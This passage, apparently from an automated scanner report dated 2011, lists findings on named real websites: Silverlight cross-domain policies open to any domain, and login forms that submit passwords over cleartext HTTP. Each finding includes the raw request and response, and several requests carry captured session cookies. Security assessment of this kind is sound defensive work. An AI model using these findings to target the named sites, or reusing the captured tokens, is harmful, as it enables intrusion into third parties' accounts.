               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:13:55 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.8. http://spd.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:133a"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.9. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Wed, 15 Jun 2011 10:33:28 GMT
Date: Mon, 13 Jun 2011 17:46:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.10. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:19:17 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.11. http://stats.wordpress.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 17:45:16 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Wed, 01 Sep 2010 15:30:22 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

5.12. http://viamtv.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: viamtv.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
xserver: www179
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.13. http://windows.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://windows.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: windows.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 492
Content-Type: text/xml
Expires: Wed, 15 Jun 2011 00:34:12 GMT
ETag: 1SLHTAjNm9LZrdKgMcT2MAXI3ANRN6JUyM+SrrTXpwk=
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-UA-Compatible: IE=9
Date: Tue, 14 Jun 2011 00:34:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">

<domain uri="http://windows.microsoft.com"/
...[SNIP]...
<domain uri="http://*.windows.microsoft.com"/><domain uri="http://explore.live.com"/><domain uri="http://*.explore.live.com"/>
...[SNIP]...

5.14. http://js.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: js.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 438588200300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Tue, 14 Jun 2011 00:34:27 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.15. http://www.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279472432300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:08 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w02w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="fluxPageContainer">
       <form name="aspnetForm" method="post" action="LogIn.aspx?callbackName=F13080112111260&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$ctl00$phBody$phBody$cLogin$tbPassword" type="password" id="ctl00_ctl00_phBody_phBody_cLogin_tbPassword" class="inputText" /><span id="ctl00_ctl00_phBody_phBody_cLogin_ctl03" relativeControl="trPassword" style="color:Red;display:none;">
...[SNIP]...

6.2. http://en.gravatar.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:30:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 9877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</h4>
   <form action="/sessions/emails%252F" method="post">
       <p>
...[SNIP]...
</label>
           <input type="password" class="text" id="account_password" name="pass" />
       </p>
...[SNIP]...

6.3. http://en.gravatar.com/site/login/%252F  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /site/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</p>

                   <form method="post" action="/sessions/">
                       <p>
...[SNIP]...
</label>
                           <input type="password" size="30" name="pass" id="account_password" class="text"/>
                       </p>
...[SNIP]...

6.4. http://members.pega.com/login.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /login.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.asp HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB; __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.8.10.1308054477; __utmz=87550468.1308054615.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87550468.1252779431.1308054615.1308054615.1308054615.1; __utmc=87550468; __utmb=87550468.1.10.1308054615; test_cookie=cookie_value; nocheck=1

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:35:52 GMT
Date: Tue, 14 Jun 2011 12:36:52 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Set-Cookie: pega%5Fautolog=000; expires=Wed, 13-Jun-2012 04:00:00 GMT; path=/
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 35546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div style="text-align: left; border: solid 1px #CCCCCC; width: 95%; height: 500px; margin: 20px 0px 20px 0px; padding: 0px 10px 0px 10px;">
                       <form action="" method="post" name="login_form" id="login_form" onsubmit="return validateFields(this);" autocomplete="off">
                           <input name="submitted" type="hidden" id="submitted" value="1" />
...[SNIP]...
<td width="713"><input type="password" name="password_display" id="password_display" class="input_field" size="35" maxlength="25" />
                                       <input name="password" id="password" type="hidden" />
...[SNIP]...

6.5. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

6.6. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

6.7. http://www.livewithoscar.com/Calendar.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Calendar.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Calendar.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.4.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:56 GMT
Content-Length: 20681

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Calendar.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

6.8. http://www.livewithoscar.com/Chat.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Chat.aspx

Issue detail

